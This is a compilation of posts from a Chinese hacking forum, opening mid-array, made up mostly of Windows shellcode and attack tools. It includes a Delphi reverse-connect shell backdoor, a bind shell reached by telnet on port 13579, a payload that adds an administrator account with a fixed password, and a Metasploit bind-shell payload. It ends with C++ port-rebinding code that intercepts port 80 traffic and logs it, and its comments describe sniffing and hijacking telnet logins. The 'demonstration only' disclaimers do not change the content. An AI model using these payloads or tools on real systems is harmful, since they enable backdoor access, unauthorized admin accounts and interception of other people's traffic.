  0x03,0xFB,0x8B,0x7A,0x20,0x03,0xFB,0x52,
  0x8B,0xD7,0x8B,0x17,0x03,0xD3,0x45,0x60,
  0x8B,0xF2,0x2B,0xC9,0xAC,0x41,0x84,0xC0,
  0x75,0xFA,0x89,0x4C,0x24,0x18,0x61,0x60,
  0x2B,0xC0,0xE8,0x51,0x00,0x00,0x00,0x3B,
  0xC6,0x61,0x74,0x08,0x83,0xC7,0x04,0x48,
  0x74,0x18,0xEB,0xD6,0x5A,0x4D,0x8B,0x4A,
  0x24,0x03,0xCB,0x0F,0xB7,0x04,0x69,0x8B,
  0x6A,0x1C,0x03,0xEB,0x8B,0x44,0x85,0x00,
  0x03,0xC3,0x89,0x44,0x24,0x1C,0x61,0xC2,
  0x08,0x00,0x60,0x2B,0xC0,0x64,0x8B,0x40,
  0x30,0x85,0xC0,0x78,0x0C,0x8B,0x40,0x0C,
  0x8B,0x70,0x1C,0xAD,0x8B,0x40,0x08,0xEB,
  0x09,0x8B,0x40,0x34,0x8D,0x40,0x7C,0x8B,
  0x40,0x3C,0x89,0x44,0x24,0x1C,0x61,0xC3,
  0x60,0xE3,0x18,0xF7,0xD0,0x32,0x02,0x42,
  0xB3,0x08,0xD1,0xE8,0x73,0x05,0x35,0x20,
  0x83,0xB8,0xED,0xFE,0xCB,0x75,0xF3,0xE2,
  0xEC,0xF7,0xD0,0x89,0x44,0x24,0x1C,0x61,
  0xC3
};

[Copy to clipboard]

一个MessageBox...
1.代码自定位
2.获取K32基址
3.动态搜索需要使用的API
4.平衡堆践

本地溢出通用反向连接ShellCode 后门程序 1k[Delphi版本]

CODE:  [Copy to clipboard]
--------------------------------------------------------------------------------
{
  SinDoor One By Anskya
  Email:Anskya@Gmail.com
  Web:Www.Anskya.Net
  QQ:115447
  说明:打开NC监听本地8848端口～运行程序返回一个Shell
  本程序ShellCode:是通用ShellCode..内部镶有API搜索引擎
  和数据代码融合(很简单的技术。。病毒和ShellCode都用得到)
  有兴趣大家自己用Debug跟一下我就不对说了...
  感谢zhengxi's Crc32函数,Vecna API函数搜索引擎和29A的病毒杂志
  还有pker的～API搜索引擎范例。。--我没有使用ShellCode变型都是
  原始代码。。。。。
  为了偷懒就把以前写的System.pas直接拿来用了。。System.pas
  中包含的API搜索引擎在这里没有使用。紧紧是为了引用ExitProcess函数而已
  ShellCode部分可以在VC下编写然后提取
  (
  小弟是用TASM直接编写用16进制编辑器直接提取..
  关于ShellCode的提取参考可以参考..《C语言直接编写ShellCode》
  或者。。那就用VC边写边翻译吧。。。^_^·力气活
  )
  本程序仅仅为了演示～Delphi编写ShellCode的示例并没有其他意图
}
program SinDoor;
const
  ShellCode:Array[0..479] of Char=
  (
    #$E8, #$00, #$00, #$00, #$00, #$5F, #$81, #$EF, #$1E, #$10, #$40, #$00, #$8D, #$87, #$DD, #$10,
    #$40, #$00, #$50, #$E8, #$E0, #$00, #$00, #$00, #$8D, #$87, #$F6, #$10, #$40, #$00, #$50, #$E8,
    #$D4, #$00, #$00, #$00, #$2B, #$ED, #$81, #$EC, #$90, #$01, #$00, #$00, #$8B, #$F4, #$54, #$6A,
    #$01, #$FF, #$97, #$05, #$11, #$40, #$00, #$68, #$50, #$45, #$43, #$00, #$68, #$43, #$4F, #$4D,
    #$53, #$8B, #$C4, #$68, #$04, #$01, #$00, #$00, #$56, #$50, #$FF, #$97, #$E6, #$10, #$40, #$00,
    #$59, #$59, #$55, #$55, #$55, #$55, #$6A, #$01, #$6A, #$02, #$FF, #$97, #$09, #$11, #$40, #$00,
    #$8B, #$D8, #$55, #$55, #$68, #$7F, #$00, #$00, #$01, #$B8, #$90, #$22, #$00, #$00, #$86, #$E0,
    #$C1, #$E0, #$10, #$83, #$C0, #$02, #$50, #$8B, #$D4, #$6A, #$10, #$52, #$53, #$FF, #$97, #$FD,
    #$10, #$40, #$00, #$85, #$C0, #$75, #$F2, #$53, #$53, #$53, #$55, #$55, #$68, #$01, #$01, #$00,
    #$00, #$6A, #$0B, #$59, #$55, #$E2, #$FD, #$8B, #$C4, #$55, #$55, #$55, #$55, #$54, #$50, #$55,
    #$55, #$55, #$6A, #$01, #$55, #$55, #$55, #$56, #$FF, #$97, #$EE, #$10, #$40, #$00, #$85, #$C0,
    #$74, #$09, #$6A, #$FF, #$50, #$FF, #$97, #$EA, #$10, #$40, #$00, #$53, #$FF, #$97, #$01, #$11,
    #$40, #$00, #$EB, #$8E, #$6B, #$65, #$72, #$6E, #$65, #$6C, #$33, #$32, #$00, #$6C, #$E0, #$F6,
    #$DC, #$29, #$02, #$54, #$D4, #$05, #$0B, #$7E, #$26, #$00, #$00, #$00, #$00, #$77, #$73, #$32,
    #$5F, #$33, #$32, #$00, #$81, #$2D, #$7E, #$5F, #$C5, #$CD, #$C6, #$1C, #$8F, #$D8, #$A4, #$BB,
    #$3C, #$19, #$7F, #$D1, #$00, #$00, #$00, #$00, #$60, #$8B, #$74, #$24, #$24, #$E8, #$97, #$00,
    #$00, #$00, #$68, #$AD, #$D1, #$34, #$41, #$50, #$E8, #$1F, #$00, #$00, #$00, #$56, #$FF, #$D0,
    #$8B, #$D8, #$2B, #$C0, #$AC, #$84, #$C0, #$75, #$FB, #$8B, #$FE, #$AD, #$85, #$C0, #$74, #$0A,
    #$50, #$53, #$E8, #$05, #$00, #$00, #$00, #$AB, #$EB, #$F1, #$61, #$C3, #$60, #$8B, #$5C, #$24,
    #$24, #$8B, #$74, #$24, #$28, #$2B, #$ED, #$8B, #$D3, #$03, #$52, #$3C, #$8B, #$52, #$78, #$03,
    #$D3, #$8B, #$42, #$18, #$8B, #$7A, #$1C, #$03, #$FB, #$8B, #$7A, #$20, #$03, #$FB, #$52, #$8B,
    #$D7, #$8B, #$17, #$03, #$D3, #$45, #$60, #$8B, #$F2, #$2B, #$C9, #$AC, #$41, #$84, #$C0, #$75,
    #$FA, #$89, #$4C, #$24, #$18, #$61, #$60, #$2B, #$C0, #$E8, #$51, #$00, #$00, #$00, #$3B, #$C6,
    #$61, #$74, #$08, #$83, #$C7, #$04, #$48, #$74, #$18, #$EB, #$D6, #$5A, #$4D, #$8B, #$4A, #$24,
    #$03, #$CB, #$0F, #$B7, #$04, #$69, #$8B, #$6A, #$1C, #$03, #$EB, #$8B, #$44, #$85, #$00, #$03,
    #$C3, #$89, #$44, #$24, #$1C, #$61, #$C2, #$08, #$00, #$60, #$2B, #$C0, #$64, #$8B, #$40, #$30,
    #$85, #$C0, #$78, #$0C, #$8B, #$40, #$0C, #$8B, #$70, #$1C, #$AD, #$8B, #$40, #$08, #$EB, #$09,
    #$8B, #$40, #$34, #$8D, #$40, #$7C, #$8B, #$40, #$3C, #$89, #$44, #$24, #$1C, #$61, #$C3, #$60,
    #$E3, #$18, #$F7, #$D0, #$32, #$02, #$42, #$B3, #$08, #$D1, #$E8, #$73, #$05, #$35, #$20, #$83,
    #$B8, #$ED, #$FE, #$CB, #$75, #$F3, #$E2, #$EC, #$F7, #$D0, #$89, #$44, #$24, #$1C, #$61, #$C3
  ) ;
begin
  asm
    lea eax,ShellCode
    call eax
  end;
end.
知道是怎么回事吧。写过ShellCode的地球人都知道。。。嘿嘿。。。
本地监听8848端口，反弹IP是127.0.0.1--仅仅是测试没有其他意思
第一次用delphi写～ShellCode~找了半天没有人用Delphi写过溢出代码～所以自己一边用VC调试一边写的这个代码～～暂时不知道为什么在TASM下通过不会感觉到任何问题。到了Delphi下就感觉速度很慢。。偶是2.8G,512M

开启Telnet服务的ShellCode代码(Delphi开源)

文章作者：Jony[E.S.T]
信息来源：邪恶八进制信息安全团队
备注：转载请署明出处及作者！

program Real;
{
作者：Jony
时间：2005-11-17
参考：RealPlayer .smil file buffer overflow
说明：
　　本想把那个C版的改为Delphi版的，但改完后效果
很不理想，有点困难，比较郁闷，本来和浪子讨论着玩
玩的，呵呵，发现Delphi写生成那部分还有点困难，先
把ShellCode部分扔这里吧。
}
Const
ShellCode:Array[0..347] of Char=(
#$29,#$c9,#$83,#$e9,#$af,#$d9,#$ee,#$d9,#$74,#$24,#$f4,#$5b,#$81,#$73,#$13,#$8f,
#$35,#$37,#$85,#$83,#$eb,#$fc,#$e2,#$f4,#$73,#$5f,#$dc,#$ca,#$67,#$cc,#$c8,#$7a,
#$70,#$55,#$bc,#$e9,#$ab,#$11,#$bc,#$c0,#$b3,#$be,#$4b,#$80,#$f7,#$34,#$d8,#$0e,
#$c0,#$2d,#$bc,#$da,#$af,#$34,#$dc,#$66,#$bf,#$7c,#$bc,#$b1,#$04,#$34,#$d9,#$b4,
#$4f,#$ac,#$9b,#$01,#$4f,#$41,#$30,#$44,#$45,#$38,#$36,#$47,#$64,#$c1,#$0c,#$d1,
#$ab,#$1d,#$42,#$66,#$04,#$6a,#$13,#$84,#$64,#$53,#$bc,#$89,#$c4,#$be,#$68,#$99,
#$8e,#$de,#$34,#$a9,#$04,#$bc,#$5b,#$a1,#$93,#$54,#$f4,#$b4,#$4f,#$51,#$bc,#$c5,
#$bf,#$be,#$77,#$89,#$04,#$45,#$2b,#$28,#$04,#$75,#$3f,#$db,#$e7,#$bb,#$79,#$8b,
#$63,#$65,#$c8,#$53,#$be,#$ee,#$51,#$d6,#$e9,#$5d,#$04,#$b7,#$e7,#$42,#$44,#$b7,
#$d0,#$61,#$c8,#$55,#$e7,#$fe,#$da,#$79,#$b4,#$65,#$c8,#$53,#$d0,#$bc,#$d2,#$e3,
#$0e,#$d8,#$3f,#$87,#$da,#$5f,#$35,#$7a,#$5f,#$5d,#$ee,#$8c,#$7a,#$98,#$60,#$7a,
#$59,#$66,#$64,#$d6,#$dc,#$66,#$74,#$d6,#$cc,#$66,#$c8,#$55,#$e9,#$5d,#$02,#$8e,
#$e9,#$66,#$be,#$64,#$1a,#$5d,#$93,#$9f,#$ff,#$f2,#$60,#$7a,#$59,#$5f,#$27,#$d4,
#$da,#$ca,#$e7,#$ed,#$2b,#$98,#$19,#$6c,#$d8,#$ca,#$e1,#$d6,#$da,#$ca,#$e7,#$ed,
#$6a,#$7c,#$b1,#$cc,#$d8,#$ca,#$e1,#$d5,#$db,#$61,#$62,#$7a,#$5f,#$a6,#$5f,#$62,
#$f6,#$f3,#$4e,#$d2,#$70,#$e3,#$62,#$7a,#$5f,#$53,#$5d,#$e1,#$e9,#$5d,#$54,#$e8,
#$06,#$d0,#$5d,#$d5,#$d6,#$1c,#$fb,#$0c,#$68,#$5f,#$73,#$0c,#$6d,#$04,#$f7,#$76,
#$25,#$cb,#$75,#$a8,#$71,#$77,#$1b,#$16,#$02,#$4f,#$0f,#$2e,#$24,#$9e,#$5f,#$f7,
#$71,#$86,#$21,#$7a,#$fa,#$71,#$c8,#$53,#$d4,#$62,#$65,#$d4,#$de,#$64,#$5d,#$84,
#$de,#$64,#$62,#$d4,#$70,#$e5,#$5f,#$28,#$56,#$30,#$f9,#$d6,#$70,#$e3,#$5d,#$7a,
#$70,#$02,#$c8,#$55,#$04,#$62,#$cb,#$06,#$4b,#$51,#$c8,#$53,#$dd,#$ca,#$e7,#$ed,
#$f1,#$ed,#$d5,#$f6,#$dc,#$ca,#$e1,#$7a,#$5f,#$35,#$37,#$85
);
begin
asm
lea eax,shellcode
call eax
end;
end.

运行后 telnet ip 13579 即可连接！

添加帐号t4nk密码为283218815的系统管理员帐户

unsigned char scode[] =
"\x29\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x74"
"\x92\x5b\x56\x83\xeb\xfc\xe2\xf4\x88\x7a\x1f\x56\x74\x92\xd0\x13"
"\x48\x19\x27\x53\x0c\x93\xb4\xdd\x3b\x8a\xd0\x09\x54\x93\xb0\x1f"
"\xff\xa6\xd0\x57\x9a\xa3\x9b\xcf\xd8\x16\x9b\x22\x73\x53\x91\x5b"
"\x75\x50\xb0\xa2\x4f\xc6\x7f\x52\x01\x77\xd0\x09\x50\x93\xb0\x30"
"\xff\x9e\x10\xdd\x2b\x8e\x5a\xbd\xff\x8e\xd0\x57\x9f\x1b\x07\x72"
"\x70\x51\x6a\x96\x10\x19\x1b\x66\xf1\x52\x23\x5a\xff\xd2\x57\xdd"
"\x04\x8e\xf6\xdd\x1c\x9a\xb0\x5f\xff\x12\xeb\x56\x74\x92\xd0\x3e"
"\x48\xcd\x6a\xa0\x14\xc4\xd2\xae\xf7\x52\x20\x06\x1c\x62\xd1\x52"
"\x2b\xfa\xc3\xa8\xfe\x9c\x0c\xa9\x93\xf1\x36\x32\x5a\xf7\x23\x33"
"\x54\xbd\x38\x76\x1a\xf7\x2f\x76\x01\xe1\x3e\x24\x54\xe6\x6f\x38"
"\x1f\xb2\x69\x6e\x47\xa0\x6a\x6e\x4c\xa3\x6e\x76\x5b\xd3\x1f\x12"
"\x54\xb4\x7d\x76\x1a\xf7\x2f\x76\x18\xfd\x38\x37\x18\xf5\x29\x39"
"\x01\xe2\x7b\x17\x10\xff\x32\x38\x1d\xe1\x2f\x24\x15\xe6\x34\x24"
"\x07\xb2\x2f\x62\x1a\xf9\x7b\x79\x35\xd6\x1f\x56";

------------------------/*
* windows/shell_bind_tcp - 349 bytes
* http://www.metasploit.com
* Encoder: x86/jmp_call_additive
* EXITFUNC=seh, LPORT=4444
*/
unsigned char shellcode[] =
"\xfc\xeb\x0c\x5e\x56\x31\x3e\xad\x01\xc7\x85\xc0\x75\xf7\xc3"
"\xbf\x4a\xe4\x11\x18\xe8\xea\xff\xff\xff\xb6\x8e\xfa\x55\xae"
"\xb6\x02\x9a\xd1\x29\x76\x09\x09\x8e\x03\x97\x6d\x45\x6f\x1d"
"\xf5\x58\x7f\x96\x4a\x43\xf4\xf6\x74\x72\xe1\x40\xff\x40\x7e"
"\x53\x11\x99\x40\xcd\x41\x5e\x80\x9a\x9e\x9e\xcb\x6e\xa1\xe2"
"\x27\x84\x9a\xb6\x93\x4d\xa9\xd3\x57\xd2\x75\x1d\x83\x8b\xfe"
"\x11\x18\xdf\x5f\x36\x9f\x34\x5c\x6a\x14\x43\x0e\x56\x36\x35"
"\x0d\xa7\x9d\xd1\x1a\x8b\x11\x91\x5c\x00\xd9\xd5\x40\xb5\x56"
"\x55\x70\x9b\x00\xd8\xce\x2d\x3d\xb4\x31\xe7\xdb\x66\xab\x60"
"\x17\xbb\x5b\x06\x24\x89\xc4\xbc\x35\x3d\x92\xf7\x27\x42\x59"
"\x58\x47\x6d\xc2\xd1\x52\xf4\x7d\x0c\x94\xfb\x28\xa5\xa7\x04"
"\x02\x51\x71\xf3\x57\x0f\xd6\xfb\x41\x03\x8a\x50\x3e\xf7\x6f"
"\x04\x83\xa4\x90\x7a\x65\x23\x7e\x27\x0f\xe0\x09\x36\x5a\x6e"
"\xae\xa3\x14\xa8\xf9\x2c\x02\x5c\x16\x82\xff\x5e\xc6\x4c\x5b"
"\x0d\xc9\x65\xf4\xb1\xc0\x25\xaf\xb2\x3d\xa1\xaa\x04\x38\x7b"
"\x63\x68\x92\x2c\xdf\xc2\x4e\x32\x0f\x79\x18\x2b\xd6\xb8\xa0"
"\xe4\xd7\x93\x06\xf4\xf7\x7a\xc3\x6e\x91\xea\x70\x02\xd4\x0e"
"\x1c\x8c\xbf\xf9\x2d\xa5\xd8\x90\xe9\x3f\xc4\x54\x32\xcc\xa2"
"\x69\xf0\x1e\x4c\xd7\xd9\xf3\x3d\xa2\x19\x5f\x96\xf8\x32\xed"
"\x16\x4d\xd4\xee\x93\xf6\x26\xc6\x00\xa0\x8a\xb6\xe7\x1f\x41"
"\x38\x56\xf1\xc0\x6b\xa7\x21\x82\x26\x8e\xc7\x9d\x6a\xcf\x1e"
"\x4b\x72\xd0\xa8\x73\x5c\xa5\x80\x77\xde\x7d\x4a\x77\x37\x2f"
"\x6c\x57\xd0\x3f\x18\x5c\x7e\xec\xe2\x8b\x7f\xc2\x1d\x34\x80"
"\xe2\x1d\x34\x80";

VC++实现服务器端口监视

wuhan2001@hotmail.com(夜星海) — Fri,09 Nov 2007 04:58:23 +0800

#include "stdafx.h"
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32.lib")
DWORD WINAPI ClientThread(LPVOID lpParam);

int main(int argc, char* argv[])
{
  if (argc!=2)
{
printf("using: listen [your ip address]\nfor example:\n listen 202.112.246.2\n");
return 0;
  }

  WORD wVersionRequested;
  DWORD ret;
  WSADATA wsaData;
  BOOL val;
  SOCKADDR_IN saddr;
  SOCKADDR_IN scaddr;
  int err;
  SOCKET s;
  SOCKET sc;
  int caddsize;
  HANDLE mt;
  DWORD tid;

  wVersionRequested = MAKEWORD( 2, 2 );
  err = WSAStartup( wVersionRequested, &wsaData );
  if ( err != 0 ) {
    printf("error!WSAStartup failed!\n");
    return -1;
  }
  saddr.sin_family = AF_INET;

  //截听虽然也可以将地址指定为INADDR_ANY，但是要不能影响正常应用情况下，应该指定具体的IP，留下127.0.0.1给正常的服务应用，然后利用这个地址进行转发，就可以不影响对方正常应用了
  saddr.sin_addr.s_addr = inet_addr(argv[1]);
  saddr.sin_port = htons(80);
  if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
  {
    printf("error!socket failed!\n");
    return -1;
  }
  val = TRUE;

//SO_REUSEADDR选项就是可以实现端口重绑定的
  if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
  {
    printf("error!setsockopt failed!\n");
    return -1;
  }
  //如果指定了SO_EXCLUSIVEADDRUSE，就不会绑定成功，返回无权限的错误代码；
  //如果是想通过重利用端口达到隐藏的目的，就可以动态的测试当前已绑定的端口哪个可以成功，就说明具备这个漏洞，然后动态利用端口使得更隐蔽
  //其实UDP端口一样可以这样重绑定利用，这儿主要是以TELNET服务为例子进行攻击
  if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
  {
    ret=GetLastError();
    printf("error!bind failed!\n");
    return -1;
  }
  listen(s,2);
  while(1)
  {
    caddsize = sizeof(scaddr);
    //接受连接请求
    sc = accept(s,(struct sockaddr *)&scaddr,&caddsize);
    if(sc!=INVALID_SOCKET)
    {
      mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
      if(mt==NULL)
      {
        printf("Thread Creat Failed!\n");
        break;
      }
    }
    CloseHandle(mt);
  }
  closesocket(s);
  WSACleanup();
  return 0;
}

DWORD WINAPI ClientThread(LPVOID lpParam)
{
  SOCKET ss = (SOCKET)lpParam;
  SOCKET sc;
  char buf[4096];
  SOCKADDR_IN saddr;
  long num;
  DWORD val;
  DWORD ret;
  //如果是隐藏端口应用的话，可以在此处加一些判断
  //如果是自己的包，就可以进行一些特殊处理，不是的话通过127.0.0.1进行转发

saddr.sin_family = AF_INET;
  saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
  saddr.sin_port = htons(80);
  if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
  {
    printf("error!socket failed!\n");
    return -1;
  }
  val = 100;
  if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
  {
    ret = GetLastError();
    return -1;
  }
  if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
  {
    ret = GetLastError();
    return -1;
  }
  if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
  {
    printf("error!socket connect failed!\n");
    closesocket(sc);
    closesocket(ss);
    return -1;
  }
// 写入文件:
ofstream oFile("port80log.txt");
if(!oFile)
{
printf("cannot write to the file.\n");
closesocket(ss);
closesocket(sc);
return 0 ;
}

  while(1)
  {
    //下面的代码主要是实现通过127。0。0。1这个地址把包转发到真正的应用上，并把应答的包再转发回去。
    //如果是嗅探内容的话，可以再此处进行内容分析和记录
        //如果是攻击如TELNET服务器，利用其高权限登陆用户的话，可以分析其登陆用户，然后利用发送特定的包以劫持的用户身份执行。
    num = recv(ss,buf,4096,0);
    if(num>0)

{
  oFile<<"\n== DATA =========================================\n";
  oFile<      send(sc,buf,num,0);
}
    else if(num==0)
      break;
    num = recv(sc,buf,4096,0);
    if(num>0)
{
  oFile<<"\n== DATA =========================================\n";
  oFile<      send(ss,buf,num,0);
}
    else if(num==0)
      break;
  }
oFile.close();

  closesocket(ss);
  closesocket(sc);
  return 0 ;
}